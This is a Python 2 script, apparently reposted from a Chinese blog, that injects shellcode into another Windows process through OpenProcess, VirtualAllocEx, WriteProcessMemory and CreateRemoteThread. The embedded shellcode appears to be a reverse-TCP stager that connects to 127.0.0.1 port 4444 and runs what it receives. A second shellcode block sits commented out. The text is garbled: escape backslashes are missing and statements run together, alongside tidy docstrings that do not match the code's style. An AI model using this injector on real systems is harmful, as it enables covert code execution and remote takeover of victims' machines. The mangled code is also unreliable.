
概述

// 转自: https://blog.csdn.net/Jailman/article/details/77573990

importsysimportpsutilimportctypesfrom ctypes import *PAGE_EXECUTE_READWRITE= 0x00000040PROCESS_ALL_ACCESS= ( 0x000F0000 | 0x00100000 | 0xFFF)

VIRTUAL_MEM= ( 0x1000 | 0x2000)

kernel32=windll.kernel32

pName= sys.argv[1]if not sys.argv[1]:print "Code Injector: ./code_injector.py "sys.exit(0)#shellcode = #"x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"#"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"#"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"#"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"#"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"#"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"#"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"#"x49x0bx31xc0x51x50xffxd7";

shellcode= ""shellcode+= "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"shellcode+= "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"shellcode+= "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"shellcode+= "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"shellcode+= "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"shellcode+= "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"shellcode+= "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"shellcode+= "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"shellcode+= "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"shellcode+= "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"shellcode+= "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"shellcode+= "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"shellcode+= "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"shellcode+= "xffxd5x6ax05x68x7fx00x00x01x68x02x00x11"shellcode+= "x5cx89xe6x50x50x50x50x40x50x40x50x68xea"shellcode+= "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"shellcode+= "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"shellcode+= "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"shellcode+= "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"shellcode+= "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"shellcode+= "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"shellcode+= "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"shellcode+= "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"shellcode+= "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"shellcode+= "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"shellcode+= "xb5xa2x56x6ax00x53xffxd5"code_size=len(shellcode)

TH32CS_SNAPPROCESS= 0x00000002

class PROCESSENTRY32(ctypes.Structure):
    """ctypes mirror of the Win32 ``PROCESSENTRY32`` record.

    Field order and types are what the Toolhelp32 snapshot API fills in;
    the first nine members are declared as ``c_ulong`` and the executable
    name as a fixed 260-byte char buffer. Nothing in the visible script
    instantiates it apart from the commented-out Toolhelp32 lookup below.
    """

    # All leading members share one type, so build them from a name list
    # and append the single fixed-width string member at the end.
    _ULONG_MEMBERS = (
        "dwSize",
        "cntUsage",
        "th32ProcessID",
        "th32DefaultHeapID",
        "th32ModuleID",
        "cntThreads",
        "th32ParentProcessID",
        "pcPriClassBase",
        "dwFlags",
    )

    _fields_ = [(member, ctypes.c_ulong) for member in _ULONG_MEMBERS] + [
        ("szExeFile", ctypes.c_char * 260),
    ]

#hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)

#pe32 = PROCESSENTRY32()#pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)#if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:#return#if pe32.szExeFile == procName:#CloseHandle(hProcessSnap)#return pe32.th32ProcessID

#while True:##yield pe32 #save the pe32#if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:#break#if pe32.szExeFile == procName:#CloseHandle(hProcessSnap)#return pe32.th32ProcessID

#CloseHandle(hProcessSnap)

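def getProcName(pname):
    """Return the PID (as a string) of the first process named *pname*.

    The name comparison is case-insensitive. Processes that vanish or deny
    access while the list is being walked are skipped rather than aborting
    the search.

    Args:
        pname: executable name to look for, e.g. ``"notepad.exe"``.

    Returns:
        The PID of the first match as a decimal string (the caller wraps
        the result in ``int()``), or ``None`` if no process matches.
    """
    wanted = pname.lower()
    for proc in psutil.process_iter():
        try:
            if proc.name().lower() == wanted:
                # Use the documented attribute instead of parsing repr():
                # the old ``str(proc).split('=')[1].split(',')[0]`` depends
                # on psutil's repr format and silently breaks when it changes.
                return str(proc.pid)
        except (psutil.AccessDenied, psutil.NoSuchProcess):
            # Best-effort enumeration: skip entries we cannot inspect.
            pass
    return None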

procPid=int(getProcName(pName))#procPid = 40560

printprocPid#Get a handle to the process we are injecting into.

h_process =kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )if noth_process:print "[*] Couldn't acquire a handle to PID: %s" %pid

sys.exit(0)#Allocate some space for the shellcode

arg_address =kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)#Write out the shellcode

written =c_int(0)

kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))#Now we create the remote thread and point it's entry routine#to be head of our shellcode

thread_id =c_ulong(0)if notkernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):print "[*] Failed to inject process-killing shellcode. Exiting."sys.exit(0)print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
